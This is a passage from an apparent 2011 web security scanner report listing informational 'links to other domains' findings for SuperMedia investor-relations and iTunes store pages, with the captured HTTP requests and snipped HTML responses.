Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A17%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Events & Presentations</title>

<meta http-equiv="C
...[SNIP]...
<td colspan="2"><a href="http://delicious.com/save?v=5&amp;amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations" onclick="window.open('http://delicious.com/save?v=5&amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations','delicious','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="delicious" title="delicious"><img src="/common/images/share/delicious_icon.gif" alt="delicious" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127" onclick="window.open('http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127','Digg','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="Digg" title="Digg"><img src="/common/images/share/digg_icon.gif" alt="Digg" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.facebook.com/share.php?u=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;t=SuperMedia - Events & Presentations" onclick="window.open('http://www.facebook.com/share.php?u=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;t=SuperMedia - Events & Presentations','Facebook','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Facebook" title="Facebook"><img src="/common/images/share/facebook_icon.gif" alt="Facebook" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations" onclick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations','LinkedIn','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="LinkedIn" title="LinkedIn"><img src="/common/images/share/linkedin_icon.gif" alt="LinkedIn" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.mixx.com/submit?page_url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations" onclick="window.open('http://www.mixx.com/submit?page_url=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127&amp;title=SuperMedia - Events & Presentations','Mixx','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Mixx" title="Mixx"><img src="/common/images/share/mixx_icon.gif" alt="Mixx" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127" onclick="window.open('http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127','Twitter','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Twitter" title="Twitter"><img src="/common/images/share/twitter_icon.gif" alt="Twitter" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127" onclick="window.open('http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/eventdetail.cfm?EventID&#61;92127','Yahoo','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Yahoo Buzz" title="Yahoo Buzz"><img src="/common/images/share/buzz_icon.png" alt="Yahoo Buzz" border="0" />
...[SNIP]...
<li><a href="http://www.superpages.com">Superpages.com</a>
...[SNIP]...
<li><a href="http://www.switchboard.com">Switchboard.com</a>
...[SNIP]...
<li><a href="http://www.localsearch.com">LocalSearch.com</a>
...[SNIP]...
<li><a href="http://www.everycarlisted.com">EveryCarListed.com</a>
...[SNIP]...
<li><a href="http://www.supertradeexchange.com">SuperTradeExchange.com</a>
...[SNIP]...
<li><a href="http://www.superguarantee.com">SuperGuarantee.com</a>
...[SNIP]...
<li><a href="http://www.directorystore.com">DirectoryStore.com</a>
...[SNIP]...
<li><a href="http://www.inceptor.com">Inceptor.com</a>
...[SNIP]...
<br>
   <img src="http://advertising.superpages.com/img/img-spportal/banners/smallverisign.jpg" alt="Verisign" /><br />
...[SNIP]...

18.73. http://ir.supermedia.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.cfm?sh_email=yes& HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A01%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:01 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title>SuperMedia - Investor Relations</titl
...[SNIP]...
<td><img src="http://apps.shareholder.com/captcha/captcha.aspx?verifyid=332661440&CompanyID=VERIZONINFO&t=.jpg" /></td>
...[SNIP]...

18.74. http://ir.supermedia.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /releasedetail.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /releasedetail.cfm?ReleaseID=546698 HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A06%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<td colspan="2"><a href="http://delicious.com/save?v=5&amp;amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://delicious.com/save?v=5&amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','delicious','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="delicious" title="delicious"><img src="/common/images/share/delicious_icon.gif" alt="delicious" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Digg','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="Digg" title="Digg"><img src="/common/images/share/digg_icon.gif" alt="Digg" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.facebook.com/share.php?u=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;t=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.facebook.com/share.php?u=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;t=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','Facebook','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Facebook" title="Facebook"><img src="/common/images/share/facebook_icon.gif" alt="Facebook" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','LinkedIn','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="LinkedIn" title="LinkedIn"><img src="/common/images/share/linkedin_icon.gif" alt="LinkedIn" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.mixx.com/submit?page_url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.mixx.com/submit?page_url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','Mixx','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Mixx" title="Mixx"><img src="/common/images/share/mixx_icon.gif" alt="Mixx" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Twitter','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Twitter" title="Twitter"><img src="/common/images/share/twitter_icon.gif" alt="Twitter" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Yahoo','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Yahoo Buzz" title="Yahoo Buzz"><img src="/common/images/share/buzz_icon.png" alt="Yahoo Buzz" border="0" />
...[SNIP]...
</chron>. In addition, a live Web cast will be

available on SuperMedia's Web site in the Investor Relations section at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.supermedia.com&esheet=6592162&lan=en-US&anchor=www.supermedia.com&index=1&md5=0480d882b54da28775eb4a48299ae350">www.supermedia.com</a>
...[SNIP]...
</sup>,

Superpages&#8480; for your mobile and Superpages&#8482; direct mail products. For

more information, visit <a href="http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.supermedia.com&esheet=6592162&lan=en-US&anchor=www.supermedia.com&index=2&md5=ed6ca67ca21e199224fa0301081f5bb1">www.supermedia.com</a>
...[SNIP]...
<p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&sty=20110201005240r1&sid=acqr4&distro=nx" /><span class="bwct31415" />
...[SNIP]...
<li><a href="http://delicious.com/save?v=5&amp;amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://delicious.com/save?v=5&amp;noui&amp;jump=close&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','delicious','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="delicious" title="delicious"><img src="/common/images/share/delicious_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://digg.com/submit?phase=2&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Digg','resizable=yes,scrollbars=yes,width=550,height=550'); return false;" alt="Digg" title="Digg"><img src="/common/images/share/digg_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://www.facebook.com/share.php?u=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;t=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.facebook.com/share.php?u=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;t=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','Facebook','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Facebook" title="Facebook"><img src="/common/images/share/facebook_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.linkedin.com/shareArticle?mini=true&amp;url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','LinkedIn','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="LinkedIn" title="LinkedIn"><img src="/common/images/share/linkedin_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://www.mixx.com/submit?page_url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23" onclick="window.open('http://www.mixx.com/submit?page_url=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698&amp;title=SuperMedia - SuperMedia to Report 2010 Earnings on February 23','Mixx','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Mixx" title="Mixx"><img src="/common/images/share/mixx_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://twitter.com/home?status=Currently%20reading%20http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Twitter','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Twitter" title="Twitter"><img src="/common/images/share/twitter_icon.gif" border="0" />
...[SNIP]...
<li><a href="http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698" onclick="window.open('http://buzz.yahoo.com/buzz?publisherurn=http://ir.supermedia.com/releasedetail.cfm?ReleaseID&#61;546698','Yahoo','resizable=yes,scrollbars=yes,width=520,height=570'); return false;" alt="Yahoo Buzz" title="Yahoo Buzz"><img src="/common/images/share/buzz_icon.png" border="0" />
...[SNIP]...

18.75. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewFeature  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewFeature

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewFeature?id=417463417&v0=WWW-NAUS-STAPG-MUSIC-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:20 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewFeature?id=417463417&v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-apple-application-site: CUP
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82804
x-apple-application-instance: 4145
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:52:20 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:52:20 PST 2011, Expires Thu Feb 03 09:52:20 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewFeature?id=417463417&v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-webobjects-loadaverage: 0
Vary: X-Apple-Store-Front
Expires: Thu, 03 Feb 2011 17:52:20 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:52:20 GMT
Content-Length: 4910
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

18.76. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMovie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewMovie

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewMovie?id=208560505&s=143441 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:47:21 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewMovie?id=208560505&s=143441
x-apple-application-site: NWK
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82803
x-apple-application-instance: 16067
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:47:21 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:47:21 PST 2011, Expires Thu Feb 03 09:47:21 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewMovie?id=208560505&s=143441
x-webobjects-loadaverage: 0
Expires: Thu, 03 Feb 2011 17:47:21 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:47:21 GMT
Content-Length: 4854
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

18.77. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMultiRoom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewMultiRoom

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewMultiRoom?fcId=417279076&v0=WWW-NAUS-STAPG-MUSIC-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:15 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewMultiRoom?fcId=417279076&v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-apple-application-site: CUP
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82804
x-apple-application-instance: 513
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:52:15 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:52:15 PST 2011, Expires Thu Feb 03 09:52:15 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewMultiRoom?fcId=417279076&v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-webobjects-loadaverage: 0
Vary: X-Apple-Store-Front
Expires: Thu, 03 Feb 2011 17:52:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:52:15 GMT
Content-Length: 4922
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

18.78. http://itunes.apple.com/us/album/i-need-doctor-feat-eminem/id415573229  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/album/i-need-doctor-feat-eminem/id415573229

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/album/i-need-doctor-feat-eminem/id415573229?v0=WWW-NAUS-STAPG-MUSIC-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:50:20 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:22 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/album/i-need-doctor-feat-eminem/id415573229?v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:54:20 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewAlbum?cc=us&id=415573229&v0=WWW-NAUS-STAPG-MUSIC-PROMO
x-apple-application-instance: 104
x-apple-lok-path: v0_1:MZStore/viewAlbum&cc=us&id=415573229&v0=WWW-NAUS-STAPG-MUSIC-PROMO-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:22 PST 2011, Expires Thu Feb 03 09:52:22 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:50:20 PST 2011, Expires Thu Feb 03 09:54:20 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=8
Date: Thu, 03 Feb 2011 17:52:14 GMT
Connection: close
Connection: Transfer-Encoding
X-Apple-Partner: origin.0
Content-Length: 63359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHAlbumPag
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-previewRegionSensitive.jsz"></script>
...[SNIP]...

18.79. http://itunes.apple.com/us/app/dead-space/id396018321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/dead-space/id396018321

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/app/dead-space/id396018321?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:50:48 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:20 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/dead-space/id396018321?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:54:48 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=396018321&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-instance: 106
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=396018321&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:20 PST 2011, Expires Thu Feb 03 09:52:20 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:50:48 PST 2011, Expires Thu Feb 03 09:54:48 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=7
Date: Thu, 03 Feb 2011 17:52:13 GMT
Content-Length: 31025
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
